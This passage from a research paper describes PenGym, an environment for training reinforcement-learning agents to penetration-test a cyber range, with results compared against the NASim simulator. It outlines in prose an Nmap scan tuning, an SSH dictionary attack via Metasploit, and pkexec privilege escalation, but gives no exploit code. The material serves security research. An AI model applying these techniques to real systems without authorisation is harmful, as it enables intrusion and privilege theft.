(2, 0): True, (3, 0): True}
PenGym:
[’192.168.122.1’, ’192.168.122.2’,
’192.168.123.1’, ’192.168.123.2’,
’192.168.123.3’, ’192.168.124.1’,
’192.168.124.4’, ’192.168.125.1’,
’192.168.125.3’, ’192.168.125.4’]
The subnet scan function in Nmap can be per-
formed with different arguments, which greatly affect
the execution time. Using only the basic -sS argu-
ment takes about 100 seconds to complete. How-
ever, by using the -Pn option to skip host discov-
ery, the -n option to disable DNS resolution, and the
-T5 timing template, the scan time can be reduced
to about 10 seconds. In addition, the -minparallel
and -maxparallel options can be used to control the
number of concurrent connections. When all the opti-
mization arguments in Algorithm 3 are used, the scan
takes only 2.49 seconds. This shows the importance
of carefully selecting the command arguments when
performing such time-consuming actions.
Exploit. The PenGym exploit action employs an
SSH dictionary attack with a username and password
list to gain access to the target host, which is imple-
mented via Metasploit. If the exploit is successful, a
Metasploit shell object is returned together with the
determined access level: USER or ROOT. This shell
object can be used for subsequent actions, such as
process scanning and privilege escalation, to investi-
gate and exploit potential vulnerabilities. The obser-
vations after executing the Exploit action (Algorithm
4) on the hosts in the ‘tiny’ scenario are equivalent in
NASim and PenGym:
NASim: access=USER
PenGym: shell object, access=USER
Process Scan. Process scanning is implemented by
executing the ps command that scans for active pro-
cesses on the target host. This command is executed
via the shell previously obtained on the targeted host
through an exploit, and returns a list of running pro-
cesses that are consistent with the scenario descrip-
tion. The observations after executing the Process
Scan action are equivalent in NASim and PenGym
(details were not included due to space limitations).
Privilege Escalation. Privilege escalation is imple-
mented by attacking vulnerabilities in the pkexec
package via Metasploit to gain root access on a tar-
get host. This requires having a pkexec package
with a version lower than 0.12 and the Ubuntu 20.04
LTS operating system. The observations after execut-
ing the Privilege Escalation action (Algorithm 5) are
equivalent in NASim and PenGym (details were not
included due to space limitations).
Figure 3: The average reward versus episode number for an RL agent trained in the NASim and PenGym environments.
5.3 RL Agent Experiments
We conducted a series of experiments to demonstrate
the feasibility and effectiveness of PenGym. For this
purpose, we selected NASim for comparison to show-
case the key differences between the emulation ap-
proach of PenGym and the simulation approach of
NASim. The RL agents were trained and tested us-
ing both NASim and PenGym as discussed below.
Agent Training. First, we independently trained 5
agents for each of the NASim and PenGym environ-
ments. Each training consisted of 100 episodes, re-
sulting in a total of 5 trained agents for each environ-
ment. We used the tabular, epsilon-greedy Q-learning
algorithm with experience replay (Sutton and Barto,
2018) in NASim, since preliminary experiments have
shown that it has superior performance compared to
the other sample algorithms included.
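For reference, the tabular Q-learning update used by this kind of agent follows the standard rule Q(s,a) ← Q(s,a) + α(r + γ max_a' Q(s',a') - Q(s,a)); the sketch below shows it together with a simple replay buffer, using illustrative hyperparameter values that do not necessarily match those of the experiments.

import random
from collections import defaultdict

alpha, gamma = 0.1, 0.99          # learning rate and discount factor (illustrative values)
q_table = defaultdict(float)      # maps (state, action) pairs to value estimates
replay_buffer = []                # stores past (state, action, reward, next_state, done) tuples

def q_update(state, action, reward, next_state, done, n_actions):
    """Standard tabular Q-learning update."""
    best_next = 0.0 if done else max(q_table[(next_state, a)] for a in range(n_actions))
    target = reward + gamma * best_next
    q_table[(state, action)] += alpha * (target - q_table[(state, action)])

def replay(batch_size, n_actions):
    """Experience replay: re-apply the update on a random batch of stored transitions."""
    batch = random.sample(replay_buffer, min(batch_size, len(replay_buffer)))
    for state, action, reward, next_state, done in batch:
        q_update(state, action, reward, next_state, done, n_actions)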
A slightly modified ‘tiny’ scenario was used to
create the training environment in this experiment.
Thus, the probability attribute of the e_ssh action
(Exploit) was set to 0.999999; this provides a sce-
nario that is closer to our cyber range, where the ex-
ploit does not fail (note that we used this value be-
cause the value 1.0 could not be assigned due to a
NASim implementation quirk).
Figure 3 shows the average rewards obtained by
training the 5 RL agents in each of the NASim and
PenGym environments over 100 episodes. Accord-
ing to our results, the PenGym framework has shown
comparable results in training agents in terms of re-
wards. As for the training time, PenGym took on
average 113.12 s compared to 45.12 s for NASim. Al-
though the training time in PenGym is longer, it is still
within reasonable limits, especially considering that
training is done in a cyber range, not via simulation.
Agent Testing. Next, the performance of the 5
trained agents for each of the NASim and PenGym
environments was evaluated by conducting 20 exper-
iments with the ‘tiny’ scenario in which the trained
agents were used to conduct pentesting in either the
NASim or PenGym environments. In addition, the
brute force and random agents made available in
NASim were also included in the evaluation, under-
going 20 trials in both environments as well.
The experiment results are summarized in Table 3.
The results of the 20 trials were averaged to derive the
final performance metrics for the agents in each envi-
ronment. To assess the consistency and variability of
the results, we also computed the standard deviation
for each test case to provide insights into the stability
and reliability of each agent performance across dif-
ferent trials. The results show that all the 5 trained
agents in both the NASim and PenGym environments
were able to successfully reach the pentesting goal in
each of the 20 test trials, resulting in a 100% success
rate for all the agents.
The results show that agents trained in NASim re-
quired more steps to reach the goal (12.42 and 11.95
steps) than the agents trained in PenGym (7.99 and
7.72 steps). This can be explained by the fact that
agents trained in NASim rely on probabilistic values
to model action success/failure. Thus, such actions
can fail due to randomly generated values that vary
each time the action is executed. In contrast, agents
trained in PenGym execute real actions in the envi-
ronment, leading to success based on realistic con-
ditions. Moreover, the agents trained in PenGym
demonstrated very good performance, with an aver-
age of 7.79 steps compared to the optimal 6 steps of
the ‘tiny’ scenario. The relatively poor performance
of the agents trained in NASim arises from the pres-
ence of a poorly trained agent, which reduced the
average performance of those agents during testing.
Additionally, testing in PenGym resulted in slightly
better performance than testing in NASim, with 7.72
steps compared to 7.99 steps, for example. As for
the brute force and random agents, they also exhibited
comparable performance in the NASim and PenGym
environments, but their results were far from optimal.
The main advantage of PenGym lies in its ability
to facilitate training with real actions in an actual en-
vironment. This eliminates the need for modeling ac-
tions using execution assumptions and success proba-
bilities, as observations come from the execution of
real actions. By executing actions without consid-
ering probabilistic factors, agents trained in PenGym
improve their algorithm based on realistic results. For
example, the success of an SSH-based exploit action
executed in NASim is determined by a random value.
This means it may fail at unexpected times, which
does not accurately reflect realistic actions, and leads
to non-deterministic effects on agent learning—which
does not happen when using PenGym. As the sys-
tem grows, the action space becomes larger, and these
probabilistic factors may affect the learning process
of the agents in unknown ways. Therefore, our ap-
proach ensures a more realistic representation of the
security dynamics in the network.
However, one drawback of PenGym is its longer
execution time compared to the simulation-based
NASim environment, since actions are physically ex-
ecuted in the network. Nonetheless, we consider the
extended training duration reasonable given that the
training takes place in a realistic cyber range. More-
over, the full automation ensures that the execution
time should be lower than human-based pentesting
and red team exercises, which often take weeks or
even months (Li et al., 2022).
5.4 Additional RL Agent Experiments
To demonstrate the potential of PenGym in adapt-
ing to more complex network environments, we
also conducted several additional experiments us-
ing higher complexity scenarios, such as ‘tiny-hard’,
‘tiny-small’, ‘small-honeypot’ and ‘small-linear’.
For example, the ‘small-linear’ scenario consists
of 6 subnets and 8 hosts, and its action space includes
a total of 72 available actions. Most hosts have sev-
eral services and processes, which correspond to mul-
tiple service-based and process-based actions within
the host. To increase the challenge of the scenario,
some hosts do not have any processes, and the num-
ber of firewalls is also higher.
We trained an agent using the same algorithm
mentioned in Section 5.3 for both the NASim and
PenGym environments. The training process involved
500 epochs for the ‘small-linear’ scenario, and 150
epochs for the other scenarios, which was enough to
allow the agent performance to stabilize.
According to the results in Table 4, PenGym train-
ing took approximately two to three times longer than
for NASim. In the simple ‘tiny’ scenario, the ratio
between PenGym and NASim was around 2.5. How-
ever, as the network size and complexity increased,
the ratio decreased to less than 2.5. Thus, the train-
ing time ratio was 1.7 for the ‘tiny-small’ scenario,
1.4 for the ‘small-honeypot’ scenario, and 2.2 for the
‘small-linear’ scenario. This suggests that more com-
plex scenarios lead to a lower comparative training
time in PenGym, a property that we attribute to the
more significant effect of our optimization methods
when a larger number of actions is repeated.
Table 4 also shows the total number of steps that
were taken to reach the pentesting goal. These results
Table 3: Comparison of the execution performance of the RL agents trained and tested in the NASim and PenGym environ-
ments; brute force and random agents are also included for reference.
Agent Training Testing Success Rate Avg. Steps Avg. Exec. Time [s] Std. Dev.
RL NASim NASim 20/20 12.42 0.0025 6.081
RL NASim PenGym 20/20 11.95 45.8329 5.046
RL PenGym NASim 20/20 7.99 0.0016 0.229
RL PenGym PenGym 20/20 7.72 43.1357 0.219
Brute force N/A NASim 20/20 47.00 0.0022 0.000
Brute force N/A PenGym 20/20 47.00 58.0670 0.000
Random N/A NASim 20/20 102.30 0.0048 38.134
Random N/A PenGym 20/20 94.80 62.0402 53.121
Table 4: Comparison of the training time and step count of
the RL agents trained in the NASim and PenGym environ-
ments for several additional scenarios.
Scenario Training Time [s] Steps
tiny
NASim 45.12 15
PenGym 113.12 11
tiny-hard
NASim 68.49 8
PenGym 198.75 13
tiny-small
NASim 316.99 9
PenGym 539.35 10
small-honeypot
NASim 1680.45 14
PenGym 2456.82 8
small-linear
NASim 2091.45 17
PenGym 4771.25 24
are recorded from the last training epoch for reference
purposes, so they do not necessarily indicate the over-
all performance of those agents. Overall, these ex-
periments demonstrate the positive characteristics of
PenGym in terms of training performance when deal-
ing with more complex scenarios.
6 DISCUSSION
This paper thoroughly demonstrated the use of a cy-
ber range based on the ‘tiny’ scenario in NASim for
realistic RL agent training. However, this scenario
has certain limitations, such as small size and simple
scope, that prevent it from being an accurate reflec-
tion of real-world circumstances. As a result, agent
performance in actual cyberattacks may be overesti-
mated when using this scenario, masking issues that
would become apparent in more complex settings.
Nevertheless, the ‘tiny’ scenario includes all the ba-
sic necessary components of a real environment, such
as hosts, subnets, firewalls, and connections between
subnets. Therefore, the use of this scenario to demon-
strate the feasibility and potential of utilizing the real
PenGym environment in comparison with simulation
environments is fully justified. To further increase the
effectiveness and generality of PenGym, more com-
plex network environments need to be recreated.
In addition, the evaluation of the trained agents
when conducting pentesting demonstrates the effec-
tiveness of PenGym, with the PenGym trained agents
achieving a slightly lower average step count com-
pared to NASim trained ones. Moreover, the aver-
age pentesting execution times were acceptable, being
less than about 45 s for the trained RL agents.
Furthermore, in the ‘tiny’ scenario privilege esca-
lation is supposed to be achieved via the Tomcat pro-
cess. However, to the best of our knowledge, it is not
possible to gain root access directly by attacking vul-
nerabilities in the Tomcat process, at least in recent
OSes. Instead, the Tomcat process can be used as an
intermediate step to obtain a Meterpreter shell, then
root access can be gained by exploiting local operat-
ing system vulnerabilities through Meterpreter. Such
an implementation would eliminate the need to first
exploit the host to get access to it, so it would change
the built-in sequence of actions in NASim. To address
this issue, in PenGym we used instead a new method
for privilege escalation, which uses a vulnerability in
the pkexec package to gain administrative access to
the target hosts, as previously mentioned. This mod-
ification enables PenGym to follow a realistic attack
scenario that is still in accordance with NASim as-
sumptions, which was important to do currently to
make their comparison possible.
We envision that PenGym could be integrated
into current cybersecurity practices, since RL agents
trained via PenGym can mimic attacker strategies and
actions in a realistic manner. This integration would
make possible the automation of pentesting in the fu-
ture, as RL agents trained via PenGym could assist
pentesters in their work, further improving the effec-
tiveness of cybersecurity assessment.
7 CONCLUSION
In this paper, we introduced PenGym, a framework
for creating real environments to support training
RL agents for penetration testing purposes. By en-
abling the execution of real actions with real obser-
vations, PenGym eliminates the need for the proba-
bilistic modeling of actions, resulting in a more ac-
curate representation of security dynamics compared
to simulation-based environments. Since PenGym
agents are trained in a cyber range, they experience
actual network conditions. This approach potentially
enhances the applicability of the trained agents when
they are deployed in a real-world infrastructure.
The framework has been validated and refined
through several experiments, demonstrating the cor-
rectness of the action implementation, as well as the
fact that PenGym can provide reliable results and rea-
sonable execution times for training. Although the
PenGym training times are longer than those of simu-
lation environments (e.g., 113.12 s versus 45.12 s on
average in our experiments when using the ‘tiny’ sce-
nario), we consider that this value is reasonable given
the actual cyber range and network use.
The PenGym framework was released on GitHub
(https://github.com/cyb3rlab/PenGym) as open
source. We plan to add support for more complex en-
vironments, thus enabling users to simulate more re-
alistic and larger scenarios that would make possible
more comprehensive testing and analysis.
In addition, we aim to improve the cyber range
creation method, which is currently mainly a manual
process that is time-consuming and cumbersome. Our
next goal is to automate cyber range creation by lever-
aging the functionality of the open-source CyTrONE
framework (Beuran et al., 2018), so that the creation
process is streamlined and more efficient.
REFERENCES
Beuran, R., Tang, D., Pham, C., Chinen, K., Tan, Y., and
Shinoda, Y. (2018). Integrated framework for hands-
on cybersecurity training: CyTrONE. Computers &
Security, 78C:43–59.
Brockman, G., Cheung, V., Pettersson, L., Schneider, J.,
Schulman, J., Tang, J., and Zaremba, W. (2016). Ope-
nAI Gym. arXiv:1606.01540.
Chaudhary, S., O’Brien, A., and Xu, S. (2020). Automated
post-breach penetration testing through reinforcement
learning. In 2020 IEEE Conference on Communica-
tions and Network Security (CNS), pages 1–2. IEEE.
Furfaro, A., Piccolo, A., Parise, A., Argento, L., and Sacca,
D. (2018). A cloud-based platform for the emulation
of complex cybersecurity scenarios. Future Genera-
tion Computer Systems, 89:791–803.
Ghanem, M. C. and Chen, T. M. (2018). Reinforcement
learning for intelligent penetration testing. In 2018
Second World Conference on Smart Trends in Sys-
tems, Security and Sustainability (WorldS4), pages
185–192.
Li, L., El Rami, J.-P. S., Taylor, A., Rao, J. H., and
Kunz, T. (2022). Enabling a network AI gym for au-
tonomous cyber agents. In 2022 International Con-
ference on Computational Science and Computational
Intelligence (CSCI), pages 172–177. IEEE.
Lyon, G. (2014). Nmap security scanner. https://nmap.org/.
Maynor, D. (2011). Metasploit toolkit for penetration test-
ing, exploit development, and vulnerability research.
Syngess Publishing, Elsevier.
McInerney, D. (2020). Pymetasploit3.
https://pypi.org/project/pymetasploit3/.
Microsoft Defender Research Team (2021). CyberBat-
tleSim. https://github.com/microsoft/cyberbattlesim.
Created by Christian Seifert, Michael Betser, William
Blum, James Bono, Kate Farris, Emily Goren, Justin
Grana, Kristian Holsheimer, Brandon Marken, Joshua
Neil, Nicole Nichols, Jugal Parikh, Haoran Wei.
Molina-Markham, A., Miniter, C., Powell, B., and Rid-
ley, A. (2021). Network environment design for au-
tonomous cyberdefense. arXiv:2103.07583.
National Vulnerability Database (2021). CVE-2021-4034.
https://nvd.nist.gov/vuln/detail/CVE-2021-4034.
Accessed: May 2, 2023.
Norman, A. (2021). Python-nmap.
https://pypi.org/project/python-nmap/.
Pozdniakov, K., Alonso, E., Stankovic, V., Tam, K., and
Jones, K. (2020). Smart security audit: Reinforce-
ment learning with a deep neural network approxima-
tor. In 2020 International Conference on Cyber Sit-
uational Awareness, Data Analytics and Assessment
(CyberSA), pages 1–8.
Schwartz, J. and Kurniawati, H. (2019). Autonomous
penetration testing using reinforcement learning.
arXiv:1905.05965.
Standen, M., Lucas, M., Bowman, D., Richer, T. J., Kim, J.,
and Marriott, D. (2021). Cyborg: A gym for the devel-
opment of autonomous cyber agents. In Proceedings
of the 1st International Workshop on Adaptive Cyber
Defense.
Sutton, R. S. and Barto, A. G. (2018). Reinforcement learn-
ing: An introduction. MIT press.
The MITRE Corporation (2018). Brawl. https://github.com/mitre/brawl-public-game-001.
Zhou, S., Liu, J., Hou, D., Zhong, X., and Zhang, Y. (2021).
Autonomous penetration testing based on improved
deep Q-network. Applied Sciences, 11(19).